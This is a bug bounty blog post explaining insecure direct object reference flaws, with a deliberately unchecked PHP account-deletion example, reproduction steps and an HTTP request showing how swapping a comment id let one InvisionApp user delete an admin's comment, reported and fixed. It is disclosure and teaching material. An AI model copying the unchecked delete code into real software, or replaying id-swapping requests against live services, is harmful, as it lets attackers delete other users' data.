InvisionApp IDOR [ Explained ]



This post is published by Harsh Jaiswal as a contributor on Bug Bounty POC. Note that the post is written by Harsh Jaiswal and any mistake in writing will be entertained only from him. We allow anyone to write content on our blog as a guest/contributor so others can also learn. If you're interested in sharing your finding through the Bug Bounty POC platform, just sign up on the blog and you can post freely.

Hello everyone out there! I’m Harsh Jaiswal. These days I’m busy with some other stuff, but after a long interval of time, in April I again started to hunt bugs to get some bucks for my vacation trip lol :p . When I started hunting in April, I set my aim to

What is IDOR?

In simple words, IDOR (Insecure Direct Object Reference) means taking actions on another user’s account from your own account, without any interaction with that user.

Why does IDOR happen?

This happens when the backend lacks an authentication check, so it never verifies that the requester is allowed to act on the object the request refers to. The explanation below shows how that looks in practice.

Suppose a web app deletes a user account in this way:

Delete Account form

<form method="post" action="">
<input type="hidden" name="user_id" value="12345678">
<input type="submit" value="Delete Account">
</form>

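Code working on /user/delete_account/

<?php
include "connection_db.php";
// The account to delete is taken straight from the request body;
// nothing ties this id to the user who sent the request.
$user_id = (int) $_POST['user_id']; // cast so the value cannot alter the SQL itself
$sql = "DELETE FROM user WHERE id={$user_id}";
if ($conn->query($sql) === TRUE) {
    echo "User account deleted successfully";
} else {
    echo "Error deleting user account " . $conn->error;
}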

Okay, as you have seen, there is no authentication check: whenever a valid user_id value is given and it exists in the DB, that account will be deleted, which is critical. This can be prevented in many ways, such as a session check, a password verification and many other ways. I hope you now understand how IDOR works; now please read the PoC below.

While testing InvisionApp I came across the Board section, where you can make a board and post in it and anyone can comment on it; only the ADMIN of the board has rights to delete any other comment. So I created two accounts, one admin and one normal user, and tried to delete the admin’s comment. To keep it short, below are the reproduction steps.

Steps to Reproduce : “A” Admin & “B” Attacker

1- Sign in from 2 different accounts ( A & B ) in 2 different browsers ( or use incognito as 2nd browser )

2- Now go to “A” account and create a board and add anything in it.

3- Comment from both “A” & “B” account.

4- Note down the comment id of the victim’s comment ( Means ID of “A” )

5- Now go to “B” account, and capture the request while deleting comment of “B” account and change comment id (of “A” account) in URL ( Example : api/board/item/comment/*COMMENT ID* )

In the “B” account you do not have the option to delete the comment of the admin, which is “A”.

6- Status will be “200 OK” and the comment of the other account should be deleted.

HTTP Request Example

DELETE /api/board/item/comment/*VICTIM COMMENT ID* HTTP/1.1
Connection: keep-alive
X-Timezone-Offset: -420
X-XSRF-TOKEN: dTK57p6DW5mteX-nBBanCmeza0RUvUaI1JksYSQF0cU
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36
X-Referrer-Hash: #/boards/2636413/80399396
Accept: application/json, text/plain, */*
X-Page-Loaded-At: 1459747535276
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: ** Cookies Goes Here **
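
The check that was missing in the steps above, shown as an added example that is not InvisionApp's code or part of the original post: a small Python/SQLite model of the comment-delete endpoint where the comment id comes from the URL and the user id from the session. The table layout, function names, status codes and sample rows are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data: user 1 ("A") is admin of board 1, user 2 ("B") is a normal user."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE boards(id INTEGER PRIMARY KEY, admin_id INTEGER NOT NULL);
        CREATE TABLE comments(id INTEGER PRIMARY KEY, board_id INTEGER NOT NULL,
                              author_id INTEGER NOT NULL, body TEXT);
        INSERT INTO boards VALUES (1, 1);
        INSERT INTO comments VALUES (100, 1, 1, 'comment by A');
        INSERT INTO comments VALUES (101, 1, 2, 'comment by B');
    """)
    return db

def comment_exists(db, comment_id):
    row = db.execute("SELECT 1 FROM comments WHERE id = ?", (comment_id,)).fetchone()
    return row is not None

def delete_comment_vulnerable(db, session_user_id, comment_id):
    """Behaviour reported in the PoC: the session user is never compared to the comment."""
    cur = db.execute("DELETE FROM comments WHERE id = ?", (comment_id,))
    return 200 if cur.rowcount else 404

def delete_comment_checked(db, session_user_id, comment_id):
    """Delete only if the session user wrote the comment or is admin of its board."""
    if session_user_id is None:
        return 401                      # no valid session
    row = db.execute(
        "SELECT c.author_id, b.admin_id FROM comments c "
        "JOIN boards b ON b.id = c.board_id WHERE c.id = ?",
        (comment_id,),
    ).fetchone()
    if row is None:
        return 404                      # unknown comment id
    author_id, admin_id = row
    if session_user_id not in (author_id, admin_id):
        return 403                      # id is valid, but not this user's to delete
    db.execute("DELETE FROM comments WHERE id = ?", (comment_id,))
    return 204
```

The identity used in the check comes only from the server-side session, never from the request path or body, and the same check has to run on every endpoint that accepts an object id.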

Bug Timeline :

3rd April : Reported Bug.

6th April : Triaged.

10th April : Given to developers to fix.

14th April : Asked to confirm the fix.

14th April : Fix confirmed by me

15th April : Rewarded with 400 USD



4 Responses

  1. It is really a nice and useful piece of information. I’m glad that you simply shared this useful info with us. Please keep us informed like this. Thank you for sharing.

  2. I just want to mention I am just a beginner to weblog and honestly loved your page. Likely I want to bookmark your blog post. You absolutely come with outstanding articles. Thanks a lot for sharing with us your blog.

    • Pranob Nath says:

      Wow… nice finding… But I have a question: there is no CSRF token implemented. A CSRF attack was also possible. Don’t you think?

  3. Pranob Nath says:

    Wow… nice finding. But I have a question: there’s no CSRF token implemented. A CSRF attack is also possible. Don’t you think?
